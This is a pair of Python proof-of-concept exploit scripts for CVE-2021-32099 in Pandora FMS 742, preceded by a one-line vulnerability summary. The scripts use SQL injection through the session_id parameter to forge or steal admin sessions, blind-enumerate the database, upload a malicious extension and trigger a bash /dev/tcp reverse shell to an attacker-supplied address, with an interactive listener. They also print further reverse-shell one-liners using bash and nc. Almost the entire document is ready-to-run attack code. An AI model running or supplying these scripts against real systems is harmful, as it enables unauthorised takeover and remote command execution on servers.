A SQL injection vulnerability in the pandora_console component of Artica Pandora FMS 742 allows an unauthenticated attacker to upgrade their unprivileged session via the /include/chart_generator.php session_id parameter, leading to a login bypass.
#!/usr/bin/env python3
"""Proof of concept for CVE-2021-32099 (Pandora FMS 742).

The script requests an admin session through the ``session_id`` parameter of
``/include/chart_generator.php``, uploads ``shell.zip`` as a console
extension and then waits for a reverse connection on the given address.

Use only against systems you are authorised to test.
"""

# The star import goes first so that the explicit imports below always win
# over whatever names pwntools happens to re-export.
from pwn import *

import argparse
import os
import signal
import socket
import sys
import threading
import time
import types

import requests
from colorama import Fore, Style


def sigIntHandler(sig: int, frame: types.FrameType | None) -> None:
    """Handle SIGINT: report it, restore the default handler and re-raise.

    The signal is re-sent to this process (rather than calling
    ``sys.exit()``) so that the default disposition terminates the program
    even while the listener thread is blocked.
    """
    print('\n')
    p = log.progress(Fore.CYAN + "Interruption" + Style.RESET_ALL)
    p.status(Fore.MAGENTA + f"SIGINT Signal sent to {sys.argv[0]}. {Fore.RED}Exiting... ⌛" + Style.RESET_ALL)
    time.sleep(1)

    signal.signal(signal.SIGINT, signal.SIG_DFL)
    # os.kill targets this process; os.killpg(os.getpid(), ...) only works
    # when the process happens to be its own process-group leader.
    os.kill(os.getpid(), signal.SIGINT)


def banner() -> str:
    """Return the coloured ASCII-art banner.

    NOTE(review): the original column spacing of the art was lost when the
    file was flattened; the rows below keep the surviving characters as-is.
    Raw strings are used because the art contains backslashes that are not
    valid escape sequences.
    """
    rows = (
        r" ______ ______ ___ ___ ___ ___ ____ ___ ___ ___ ___",
        r"/ ___/ | / / __/___|_ |/ _ \|_ < /___|_ /|_ |/ _ \/ _ \/ _ |",
        r"/ /__ | |/ / _//___/ __// // / __// /___//_ </ __// // /\_, /\_, /",
        r"\___/ |___/___/ /____/\___/____/_/ /____/____/\___//___//___/",
    )
    return f"{Fore.GREEN}\n" + "\n".join(rows) + f"\n{Style.RESET_ALL}"


def revShellWarning(ip, port) -> str:
    """Return the notice printed once a connection has been received.

    ``port`` may be an ``int`` or a numeric string; the message refers to
    ``port + 1``.
    """
    next_port = int(port) + 1
    return (
        f"{Fore.MAGENTA}[!] {Fore.RED}The Reverse Shell obtained is not associated with a stable TTY/PTY ❗\n"
        f"{Fore.MAGENTA}[+] {Fore.BLUE}Try to stablish another reverse connection as follows →\n"
        f"{Fore.CYAN}[*] {Fore.MAGENTA}bash -c \"bash -i &> /dev/tcp/{ip}/{next_port} 0>&1\n"
        f"{Fore.CYAN}[*] {Fore.MAGENTA}rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc {ip} {next_port} >/tmp/f{Style.RESET_ALL}\n"
    )


class Exploit:
    """Drive the three steps of the PoC against one console URL."""

    def __init__(self, url, ip, port):
        self.url = url.strip('/')
        self.ip = ip
        self.port = port
        # One session is shared so the cookie set in the first step is
        # reused by the following requests.
        self.session = requests.Session()
        self.file = 'shell.zip'
        self.payload = f'bash -c "bash -i %26> /dev/tcp/{self.ip}/{self.port} 0>%261"'

    def generateAdminCookie(self) -> bool:
        """Request an admin session through the ``session_id`` parameter.

        This method is the main entry point. The value sent as
        ``session_id`` is not properly sanitized by the target; the resulting
        PHPSESSID cookie is kept in ``self.session`` for later use.

        Returns:
            True when the expected page marker is present in the response,
            False otherwise. Exits with status 1 on a transport error.
        """
        sqli_url = self.url + "/include/chart_generator.php"

        print()
        p = log.progress(Fore.CYAN + "SQLi" + Style.RESET_ALL)
        p.status(Fore.MAGENTA + "Generating the Admin Cookie ⌛..." + Style.RESET_ALL)

        try:
            r = self.session.get(
                sqli_url + "?session_id='+UNION+SELECT+1,2,'id_usuario|s:5:%22admin%22;'+--+-"
            )
        except requests.RequestException as e:
            # The original printed an empty string here, hiding the cause.
            print(Fore.RED + f"Error: {e}" + Style.RESET_ALL)
            sys.exit(1)

        if "Pandora FMS Graph ( - )" not in r.text:
            p.failure(Fore.RED + "The Admin Cookie 🍪 could not be generated ❌" + Style.RESET_ALL)
            return False

        p.success(Fore.GREEN + "Admin Cookie 🍪 generated successfully ✔" + Style.RESET_ALL)
        # Formatting (instead of concatenation) avoids a TypeError when the
        # response carries no PHPSESSID cookie.
        print(
            Fore.MAGENTA + f"\n[+] {Fore.YELLOW}Admin Cookie ➜ "
            + Fore.MAGENTA + f"{r.cookies.get('PHPSESSID')}" + Style.RESET_ALL
        )
        return True

    def uploadMaliciousExtension(self) -> bool:
        """POST ``self.file`` to the console's extension uploader.

        Uses the session (and therefore the cookie) obtained by
        ``generateAdminCookie``.

        Returns:
            True when the response reports a successful upload, False
            otherwise. Exits with status 1 on a transport error.
        """
        print()
        p = log.progress(Fore.CYAN + "Pandora Extension 💀" + Style.RESET_ALL)
        p.status(Fore.MAGENTA + "Uploading the malicious extension ⌛..." + Style.RESET_ALL)
        time.sleep(1)

        upload_url = self.url + "/index.php?sec=godmode/extensions&sec2=extensions/extension_uploader"
        post_data = {
            'upload': '1',
            'submit': 'Upload',
        }

        with open(self.file, "rb") as f:
            files = {'extension': (self.file, f.read(), 'application/zip')}

        try:
            r = self.session.post(upload_url, files=files, data=post_data)
        except requests.RequestException as e:
            print(Fore.RED + f"Error: {e}" + Style.RESET_ALL)
            sys.exit(1)  # was sys.exit(), i.e. status 0 on failure

        if "Extension uploaded successfully" in r.text:
            p.success(Fore.GREEN + "Extension uploaded successfully ✔" + Style.RESET_ALL)
            return True

        p.failure(Fore.RED + "Something went wrong trying to upload the extension ❌" + Style.RESET_ALL)
        return False

    def setListener(self) -> None:
        """Accept one TCP connection on ``ip:port`` and relay typed commands.

        Runs in its own thread. Each line read from stdin is sent to the
        peer and up to 4096 bytes of the reply are printed; typing ``exit``
        ends the loop.
        """
        print()
        p = log.progress(Fore.CYAN + "Socket ⚙" + Style.RESET_ALL)
        p.status(Fore.MAGENTA + f"Waiting for connection on {self.ip}:{self.port} ⌛..." + Style.RESET_ALL)
        time.sleep(1)

        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            s.bind((self.ip, int(self.port)))
            s.listen(1)
            conn, addr = s.accept()

            # Close the accepted socket as well as the listening one.
            with conn:
                p.success(Fore.GREEN + f"Connection received from {addr[0]}:{addr[1]} ✔" + Style.RESET_ALL)
                print(revShellWarning(self.ip, self.port))
                print(Fore.RED + f'[+] {Fore.YELLOW}Press [Enter] to get the Reverse Shell' + Style.RESET_ALL)
                print(Fore.RED + f'\n[+] {Fore.YELLOW}Press C-c or type "exit" to quit the Shell\n' + Style.RESET_ALL)
                print(conn.recv(4096).decode(), end='')

                while True:
                    cmd = input()
                    if cmd == "exit":
                        break
                    conn.send((cmd + '\n').encode())
                    time.sleep(1)
                    print(conn.recv(4096).decode(), end='')

    def getReverseShell(self) -> bool:
        """Send a GET request carrying ``self.payload`` to the uploaded extension.

        Returns:
            True when the server answers with HTTP 200, False otherwise.
            Exits with status 1 on a transport error.
        """
        print()
        p = log.progress(Fore.CYAN + "Rev Shell 🐉" + Style.RESET_ALL)
        p.status(Fore.MAGENTA + "Getting the reverse shell ⌛..." + Style.RESET_ALL)
        time.sleep(1)

        extension_url = self.url + "/extensions/shell.php"

        try:
            r = self.session.get(extension_url + f'?cmd={self.payload}')
        except requests.RequestException as e:
            print(Fore.RED + f"Error: {e}" + Style.RESET_ALL)
            sys.exit(1)

        if r.status_code == 200:
            p.success(Fore.GREEN + "Reverse Shell send correctly ✔" + Style.RESET_ALL)
            return True

        p.failure(Fore.RED + "Could not send the reverse shell ❌" + Style.RESET_ALL)
        return False

    def runExploit(self) -> None:
        """Run the steps in order, stopping as soon as one of them fails."""
        if not self.generateAdminCookie():
            sys.exit(1)
        # Without a successful upload the listener would block forever.
        if not self.uploadMaliciousExtension():
            sys.exit(1)

        lthread = threading.Thread(target=self.setListener)
        lthread.start()
        time.sleep(1)  # give the listener time to bind before triggering
        self.getReverseShell()
        lthread.join()


def main() -> None:
    """Parse the command line and run the PoC."""
    print(banner())
    signal.signal(signal.SIGINT, sigIntHandler)

    parser = argparse.ArgumentParser(
        description=Fore.MAGENTA + "CVE-2021-32099 PoC" + Style.RESET_ALL
    )
    parser.add_argument('url', help='Pandora Console URL e.g. http://localhost:8080/pandora_console')
    parser.add_argument('ip', help='Attacker IP Address')
    parser.add_argument('lport', help='Attacker Listening Port')
    opts = parser.parse_args()

    # argparse already rejects missing positionals; this catches empty ones.
    if any(not opt for opt in (opts.url, opts.ip, opts.lport)):
        parser.print_help()
        sys.exit(1)

    exploit = Exploit(opts.url, opts.ip, opts.lport)
    exploit.runExploit()


if __name__ == '__main__':
    main()
Extended Exploit
#!/usr/bin/env python3
"""Extended proof of concept for CVE-2021-32099 (Pandora FMS 742).

``SQLInjection`` enumerates the database through boolean responses of
``/include/chart_generator.php`` and ends with an admin session id;
``Shell`` uploads ``shell.zip`` as an extension and waits for a reverse
connection.

Use only against systems you are authorised to test.
"""

# The star import goes first so that the explicit imports below always win
# over whatever names pwntools happens to re-export.
from pwn import *

import argparse
import os
import signal
import socket
import string
import sys
import threading
import time

import requests
from colorama import Fore, Style


def sigintHandler(sig, term) -> None:
    """Handle SIGINT: report it, restore the default handler and re-raise.

    The signal is re-sent to this process (rather than calling
    ``sys.exit()``) so that the default disposition terminates the program
    even while the listener thread is blocked.
    """
    print("\n")
    p = log.progress(Fore.CYAN + 'Exit' + Style.RESET_ALL)
    p.status(Fore.MAGENTA + "SIGINT signal sent to the current process. Exiting... ⏳" + Style.RESET_ALL)
    time.sleep(1)

    signal.signal(signal.SIGINT, signal.SIG_DFL)
    # os.kill targets this process; os.killpg(os.getpid(), ...) only works
    # when the process happens to be its own process-group leader.
    os.kill(os.getpid(), signal.SIGINT)


def banner() -> str:
    """Return the coloured ASCII-art banner.

    NOTE(review): the original column spacing of the art was lost when the
    file was flattened; the rows below keep the surviving characters as-is.
    Raw strings are used because the art contains backslashes that are not
    valid escape sequences.
    """
    rows = (
        r" ______ ______ ___ ___ ___ ___ ____ ___ ___ ___ ___",
        r"/ ___/ | / / __/___|_ |/ _ \|_ < /___|_ /|_ |/ _ \/ _ \/ _ |",
        r"/ /__ | |/ / _//___/ __// // / __// /___//_ </ __// // /\_, /\_, /",
        r"\___/ |___/___/ /____/\___/____/_/ /____/____/\___//___//___/",
    )
    return f"{Fore.GREEN}\n" + "\n".join(rows) + f"\n{Style.RESET_ALL}"


def revShellWarning(ip: str, port: int | str) -> str:
    """Return the notice printed before the reverse connection is requested.

    ``port`` may be an ``int`` or a numeric string; the message refers to
    ``port + 1``.
    """
    next_port = int(port) + 1
    return (
        f"{Fore.MAGENTA}[!] {Fore.RED}The Reverse Shell obtained is not associated with a stable TTY/PTY ❗\n"
        f"{Fore.MAGENTA}[ℹ] {Fore.BLUE}Try to stablish another reverse connection as follows →\n"
        f"{Fore.CYAN}[*] {Fore.MAGENTA}bash -c \"bash -i &> /dev/tcp/{ip}/{next_port} 0>&1\n"
        f"{Fore.CYAN}[*] {Fore.MAGENTA}rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc {ip} {next_port} >/tmp/f{Style.RESET_ALL}\n"
    )


class SQLInjection():
    """Boolean-based enumeration through the ``session_id`` parameter.

    Every probe is a GET request; the presence or absence of
    ``ACCESS_DENIED_MSG`` in the response body is the one-bit answer.
    """

    def __init__(self, url: str) -> None:
        self.url = url.strip('/') + '/include/chart_generator.php'
        self.chars = string.ascii_letters + string.digits + '-_'
        self.session = requests.Session()
        self.db_length = 0
        self.database = ''
        self.table = ''
        self.columns_length = 0
        self.adminCookie_length = 0
        self.admin_cookie = ''
        self.ACCESS_DENIED_MSG = "Access denied"

    def makeSQLQuery(self, query: str) -> requests.Response:
        """GET ``self.url + query`` and return the response.

        Exits with status 1 when the request itself fails.
        """
        try:
            return self.session.get(self.url + query)
        except requests.RequestException as e:
            print(Fore.RED + f"Error: {e}" + Style.RESET_ALL)
            sys.exit(1)

    def getDBLength(self) -> int:
        """Return the length of the current database name (probes 1..19).

        Exits with status 1 when no probed length matches; the original
        fell through and returned ``None``, which crashed the caller.
        """
        print()
        p1 = log.progress(Fore.CYAN + "SQLi" + Style.RESET_ALL)
        p1.status(Fore.MAGENTA + "Extracting Current DB Name Length... ⏳" + Style.RESET_ALL)
        time.sleep(1)

        print()
        p2 = log.progress(Fore.GREEN + "Length" + Style.RESET_ALL)

        for number in range(1, 20):
            r = self.makeSQLQuery(f"?session_id='+or+IF(LENGTH(database())={number},1,0)--+-")
            p2.status(Fore.CYAN + str(number) + Style.RESET_ALL)

            if self.ACCESS_DENIED_MSG not in r.text:
                p2.success(Fore.RED + str(number) + Style.RESET_ALL)
                p1.success(Fore.GREEN + "Current DB Length extracted ✔" + Style.RESET_ALL)
                return number

        p1.failure(Fore.RED + "Could not determine the DB Name Length ❌" + Style.RESET_ALL)
        sys.exit(1)

    def getDBName(self) -> None:
        """Recover the current database name, one character per position."""
        self.db_length = self.getDBLength()

        print()
        p1 = log.progress(Fore.CYAN + "SQLi" + Style.RESET_ALL)
        p1.status(Fore.MAGENTA + "Enumerating DB Name... ⏳" + Style.RESET_ALL)
        time.sleep(1)

        print()
        p2 = log.progress(Fore.GREEN + "Database" + Style.RESET_ALL)

        for position in range(1, self.db_length + 1):
            for char in self.chars:
                r = self.makeSQLQuery(f"?session_id='+or+IF(SUBSTR((select+database()),{position},1)='{char}',1,0)+--+-")
                p2.status(Fore.RED + self.database + char + Style.RESET_ALL)

                if self.ACCESS_DENIED_MSG not in r.text:
                    self.database += char
                    break

        p2.success(Fore.RED + self.database + Style.RESET_ALL)
        p1.success(Fore.GREEN + "Current DB Name extracted ✔" + Style.RESET_ALL)

    def getDBTables(self) -> None:
        """Print the table names of the current database as they are found.

        The listing can be left early with C-c. Afterwards the user is asked
        for the table whose columns should be listed; the answer is stored
        in ``self.table``.
        """
        self.getDBName()
        # Let C-c raise KeyboardInterrupt here instead of ending the program.
        signal.signal(signal.SIGINT, signal.default_int_handler)

        print()
        p = log.progress(Fore.CYAN + "SQLi" + Style.RESET_ALL)
        p.status(Fore.MAGENTA + f"Extracting {self.database} DB Tables Names... ⏳" + Style.RESET_ALL)
        time.sleep(2)
        p.status(Fore.MAGENTA + f"{Fore.YELLOW}Press C-c to leave the DB Table Extraction Mode" + Style.RESET_ALL)

        print(
            Fore.MAGENTA + f"\n[+] {Fore.CYAN}{self.database} DB Tables:",
            Fore.GREEN + "\n\n\t[*] " + Style.RESET_ALL,
            end=''
        )

        try:
            for position in range(1, 2800):
                for char in self.chars + ',':
                    r = self.makeSQLQuery(
                        f"?session_id='+or+IF(SUBSTR((SELECT+GROUP_CONCAT(table_name)+FROM+information_schema.tables+WHERE+table_schema='{self.database}'),{position},1)='{char}',0,1)+--+-"
                    )

                    if self.ACCESS_DENIED_MSG in r.text:
                        if char == ',':
                            # A comma separates table names: start a new bullet.
                            print(Fore.GREEN + "\n\t[*] " + Style.RESET_ALL, end='')
                        else:
                            print(Fore.CYAN + char + Style.RESET_ALL, end='')
                        break
        except KeyboardInterrupt:
            p.failure(Fore.RED + "Exiting... ⌛" + Style.RESET_ALL)
            time.sleep(1)
        else:
            # Only report completion when the listing was not interrupted.
            p.success(Fore.GREEN + "Finished extracted DB Tables ✔" + Style.RESET_ALL)

        self.table = input(Fore.MAGENTA + f"\n\n[+] {Fore.YELLOW}Enter a DB Table to get its columns: " + Style.RESET_ALL)

    def getDBColumnsLength(self) -> int:
        """Return the length of the comma-joined column list of ``self.table``.

        Also re-installs ``sigintHandler``. Exits with status 1 when no
        probed length (1..199) matches.
        """
        signal.signal(signal.SIGINT, sigintHandler)

        print()
        p1 = log.progress(Fore.CYAN + "SQLi" + Style.RESET_ALL)
        p1.status(Fore.MAGENTA + "Extracting Total Length of All Columns... ⏳" + Style.RESET_ALL)
        time.sleep(1)

        print()
        p2 = log.progress(Fore.CYAN + f"{self.table} columns' length" + Style.RESET_ALL)

        for number in range(1, 200):
            r = self.makeSQLQuery(f"?session_id='+OR+IF(LENGTH((SELECT+GROUP_CONCAT(column_name)+FROM+information_schema.columns+WHERE+table_schema='{self.database}'+AND+table_name='{self.table}'))='{number}',0,1)+--+-")
            p2.status(Fore.RED + str(number) + Style.RESET_ALL)

            if self.ACCESS_DENIED_MSG in r.text:
                p2.success(Fore.GREEN + str(number) + Style.RESET_ALL)
                p1.success(Fore.GREEN + f"Total Length of all Columns extracted for {self.table} ✔" + Style.RESET_ALL)
                return number

        p1.failure(Fore.RED + f"Could not determine the columns' length for {self.table} ❌" + Style.RESET_ALL)
        sys.exit(1)

    def getDBTableColumns(self) -> list[str]:
        """Return the column names of ``self.table`` as a list of strings."""
        self.columns_length = self.getDBColumnsLength()
        columns = ''

        print()
        p1 = log.progress(Fore.CYAN + "SQLi" + Style.RESET_ALL)
        p1.status(Fore.MAGENTA + f"Extracting Columns for {self.table} DB Table... ⏳" + Style.RESET_ALL)
        time.sleep(1)

        print()
        p2 = log.progress(Fore.GREEN + "Columns" + Style.RESET_ALL)

        for position in range(1, self.columns_length + 1):
            for char in self.chars + ',':
                r = self.makeSQLQuery(f"?session_id='+or+IF(SUBSTR((SELECT+GROUP_CONCAT(column_name)+FROM+information_schema.columns+WHERE+table_schema='{self.database}'+and+table_name='{self.table}'),{position},1)='{char}',0,1)+--+-")
                p2.status(Fore.CYAN + columns + char + Style.RESET_ALL)

                if self.ACCESS_DENIED_MSG in r.text:
                    # Display separator is ", "; it is stripped again below.
                    columns += char if char != ',' else char + ' '
                    break

        p2.success(Fore.GREEN + f"{columns}" + Style.RESET_ALL)
        p1.success(Fore.GREEN + f"Columns of {self.table} extracted ✔" + Style.RESET_ALL)

        return [column.strip() for column in columns.split(',')]

    def generateAdminCookie(self) -> None:
        """Request a fresh admin session and store its id in ``self.admin_cookie``.

        Called only when no stored admin session was found. The value sent
        as ``session_id`` is not properly sanitized by the target. Exits with
        status 1 when the expected page marker is absent.
        """
        print()
        p = log.progress(Fore.CYAN + "SQLi" + Style.RESET_ALL)
        p.status(Fore.MAGENTA + "Generating Admin Cookie ⌛..." + Style.RESET_ALL)
        time.sleep(1)

        r = self.makeSQLQuery("?session_id='+UNION+SELECT+1,2,'id_usuario|s:5:%22admin%22;'+--+-")

        if "Pandora FMS Graph ( - )" not in r.text:
            p.failure(Fore.RED + "Something went wrong trying to generate an Admin Cookie ❌" + Style.RESET_ALL)
            sys.exit(1)

        p.success(Fore.GREEN + "Admin Cookie 🍪 generated successfully ✓" + Style.RESET_ALL)
        # Keep the attribute a string even when no PHPSESSID cookie came back,
        # so the later split() cannot fail on None.
        self.admin_cookie = r.cookies.get('PHPSESSID') or ''

    def getAdminCookieNumber(self) -> bool:
        """Return True when between 1 and 20 admin sessions are stored."""
        print()
        p1 = log.progress(Fore.CYAN + "SQLi" + Style.RESET_ALL)
        p1.status(Fore.MAGENTA + "Checking if there is any Admin Cookie ⏳..." + Style.RESET_ALL)
        time.sleep(1)

        print()
        p2 = log.progress(Fore.CYAN + "Admin Cookie[s] Number" + Style.RESET_ALL)

        for number in range(0, 21):
            r = self.makeSQLQuery(f"?session_id='+OR+IF((SELECT+COUNT(*)+FROM+{self.table}+WHERE+data+LIKE+'%25admin%25')={number},0,1)+--+-")
            p2.status(Fore.MAGENTA + str(number) + Style.RESET_ALL)

            if self.ACCESS_DENIED_MSG in r.text and number != 0:
                p2.success(Fore.GREEN + str(number) + Style.RESET_ALL)
                p1.success(Fore.GREEN + "Number of Admin Cookies 🍪 extracted ✔" + Style.RESET_ALL)
                return True

        p2.failure(Fore.RED + "0" + Style.RESET_ALL)
        p1.failure(Fore.RED + "There is no Admin Cookie 🍪" + Style.RESET_ALL)
        return False

    def getAdminCookieLength(self) -> None:
        """Store the length of the comma-joined admin session ids.

        The result goes to ``self.adminCookie_length``. Exits with status 1
        when no probed length (1..799) matches; the original left the
        attribute as ``''`` and crashed later.
        """
        print()
        p1 = log.progress(Fore.CYAN + "SQLi" + Style.RESET_ALL)
        p1.status(Fore.MAGENTA + "Extracting Admin Cookie[s] 🍪 length... ⏳" + Style.RESET_ALL)
        time.sleep(1)

        print()
        p2 = log.progress(Fore.CYAN + "Admin Cookie[s] Length" + Style.RESET_ALL)

        for number in range(1, 800):
            r = self.makeSQLQuery(f"?session_id='+OR+IF(LENGTH((SELECT+GROUP_CONCAT(id_session)+FROM+{self.table}+where+data+like+'%25admin%25'))={number},0,1)+--+-")
            p2.status(Fore.RED + str(number) + Style.RESET_ALL)

            if self.ACCESS_DENIED_MSG in r.text:
                p2.success(Fore.GREEN + str(number) + Style.RESET_ALL)
                p1.success(Fore.GREEN + "Admin Cookie[s] length extracted ✔" + Style.RESET_ALL)
                self.adminCookie_length = number
                return

        p1.failure(Fore.RED + "Could not determine the Admin Cookie[s] length ❌" + Style.RESET_ALL)
        sys.exit(1)

    def getAdminCookie(self) -> None:
        """Recover the stored admin session ids into ``self.admin_cookie``.

        Called only when at least one admin session was found.
        """
        print()
        p1 = log.progress(Fore.CYAN + "SQLi" + Style.RESET_ALL)
        p1.status(Fore.MAGENTA + f"Extracting Cookies Admin 🍪 from id_session column... ⌛" + Style.RESET_ALL)
        time.sleep(1)

        print()
        p2 = log.progress(Fore.CYAN + "Admin Cookie[s] 🍪" + Style.RESET_ALL)

        for position in range(1, self.adminCookie_length + 1):
            for char in self.chars + ',':
                r = self.makeSQLQuery(f"?session_id='+OR+IF(SUBSTR((SELECT+GROUP_CONCAT(id_session)+FROM+{self.table}+WHERE+data+like+'%25admin%25'),{position},1)='{char}',0,1)+--+-")
                p2.status(Fore.RED + self.admin_cookie + char + Style.RESET_ALL)

                if self.ACCESS_DENIED_MSG in r.text:
                    # Display separator is ", "; it is stripped by the caller.
                    self.admin_cookie += char if char != ',' else char + ' '
                    break

        p2.success(Fore.GREEN + f"{self.admin_cookie}" + Style.RESET_ALL)
        p1.success(Fore.GREEN + "Admin Cookie[s] extracted ✔" + Style.RESET_ALL)

    def runSQLInjection(self) -> list[str]:
        """Run the whole enumeration and return the admin session ids found."""
        self.getDBTables()
        self.getDBTableColumns()

        if self.getAdminCookieNumber():
            self.getAdminCookieLength()
            self.getAdminCookie()
        else:
            self.generateAdminCookie()

        return [cookie.strip() for cookie in self.admin_cookie.split(',')]


class Shell():
    """Upload the extension and handle the resulting reverse connection."""

    def __init__(self, url: str, ip: str, port: int | str, cookie: str) -> None:
        self.url = url.strip('/')
        self.ip = ip
        self.port = port
        self.cookie = cookie
        self.file = "shell.zip"
        self.payload = f'bash -c "bash -i %26> /dev/tcp/{self.ip}/{self.port} 0>%261"'

    def uploadMaliciousExtension(self) -> bool:
        """POST ``self.file`` to the console's extension uploader.

        The request is authenticated with ``self.cookie`` as PHPSESSID.

        Returns:
            True when the response reports a successful upload, False
            otherwise. Exits with status 1 on a transport error.
        """
        upload_url = self.url + '/index.php?sec=godmode/extensions&sec2=extensions/extension_uploader'
        cookies = {'PHPSESSID': self.cookie}
        data = {
            "upload": "1",
            "submit": "Upload",
        }

        with open(self.file, "rb") as f:
            files = {'extension': (self.file, f.read(), 'application/zip')}

        print()
        p = log.progress(Fore.CYAN + "Pandora Extension" + Style.RESET_ALL)
        p.status(Fore.MAGENTA + "Uploading malicious extension... ⌛" + Style.RESET_ALL)
        time.sleep(1)

        try:
            r = requests.post(upload_url, data=data, cookies=cookies, files=files)
        except requests.RequestException as e:
            print(Fore.RED + f"Error: {e}" + Style.RESET_ALL)
            sys.exit(1)

        if "Extension uploaded successfully" in r.text:
            p.success(Fore.GREEN + "Extension uploaded successfully ✔" + Style.RESET_ALL)
            return True

        p.failure(Fore.RED + "Something went wrong trying to upload the malicious extension ❌" + Style.RESET_ALL)
        return False

    def setListener(self) -> None:
        """Accept one TCP connection on ``ip:port`` and relay typed commands.

        Runs in its own thread. Each line read from stdin is sent to the
        peer and up to 4096 bytes of the reply are printed; typing ``exit``
        ends the loop.
        """
        print()
        p = log.progress(Fore.CYAN + "Socket" + Style.RESET_ALL)
        p.status(Fore.MAGENTA + f"Setting up a listener on {self.ip}:{self.port} ⌛..." + Style.RESET_ALL)
        time.sleep(1)

        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            s.bind((self.ip, int(self.port)))
            s.listen(1)
            conn, addr = s.accept()

            # Close the accepted socket as well as the listening one.
            with conn:
                p.status(Fore.GREEN + f"Connection received from {addr[0]}:{addr[1]}. Press [Enter] to get the Shell" + Style.RESET_ALL)
                print(Fore.MAGENTA + f"[+] {Fore.YELLOW}Press Enter to get the shell" + Style.RESET_ALL)
                print(Fore.MAGENTA + f"\n[+] {Fore.YELLOW}Press C-c or type \"exit\" to leave the shell\n" + Style.RESET_ALL)
                print(conn.recv(4096).decode(), end='')

                while True:
                    cmd = input()
                    if cmd == "exit":
                        p.failure(Fore.RED + "Socket closed ✔" + Style.RESET_ALL)
                        break
                    conn.send((cmd + '\n').encode())
                    time.sleep(1)
                    print(conn.recv(4096).decode(), end='')

    def getReverseShell(self) -> bool:
        """Send a GET request carrying ``self.payload`` to the uploaded extension.

        Returns:
            True when the server answers with HTTP 200, False otherwise.
            Exits with status 1 on a transport error.
        """
        extension_url = self.url + '/extensions/shell.php'

        print()
        p = log.progress(Fore.CYAN + "Reverse Shell" + Style.RESET_ALL)
        p.status(Fore.MAGENTA + f"Sending the Reverse shell to {self.ip}:{self.port}... ⌛" + Style.RESET_ALL)
        time.sleep(1)
        print(revShellWarning(self.ip, self.port))

        try:
            r = requests.get(extension_url + f'?cmd={self.payload}')
        except requests.RequestException as e:
            print(Fore.RED + f"Error: {e}" + Style.RESET_ALL)
            sys.exit(1)

        if r.status_code == 200:
            p.success(Fore.GREEN + f"Reverse Shell sent correctly to {self.ip}:{self.port} ✔" + Style.RESET_ALL)
            return True

        p.failure(Fore.RED + "Something went wrong trying to send the reverse shell ❌" + Style.RESET_ALL)
        return False

    def runShell(self) -> None:
        """Upload, listen and trigger; exits with status 99 without a cookie."""
        if not self.cookie:
            sys.exit(99)

        if self.uploadMaliciousExtension():
            lthread = threading.Thread(target=self.setListener)
            lthread.start()
            time.sleep(2)  # give the listener time to bind before triggering
            self.getReverseShell()
            lthread.join()


def main() -> None:
    """Parse the command line, run the enumeration, then the shell stage."""
    print(banner())
    signal.signal(signal.SIGINT, sigintHandler)

    parser = argparse.ArgumentParser(
        description=Fore.MAGENTA + "SQLi to exploit Pandora FMS 7.0" + Style.RESET_ALL
    )
    parser.add_argument('url', help="Pandora FMS Console URL e.g. http://domain.tld/pandora_console")
    parser.add_argument('ip', help="Attacker IP Address")
    parser.add_argument('port', help="Attacker Listening Port")
    opts = parser.parse_args()

    # argparse already rejects missing positionals; this catches empty ones.
    if any(not opt for opt in (opts.url, opts.ip, opts.port)):
        parser.print_help()
        sys.exit(1)

    sqli = SQLInjection(opts.url)
    admin_cookie = sqli.runSQLInjection()

    # Only the first recovered session id is used.
    shell = Shell(opts.url, opts.ip, opts.port, admin_cookie[0])
    shell.runShell()


if __name__ == '__main__':
    main()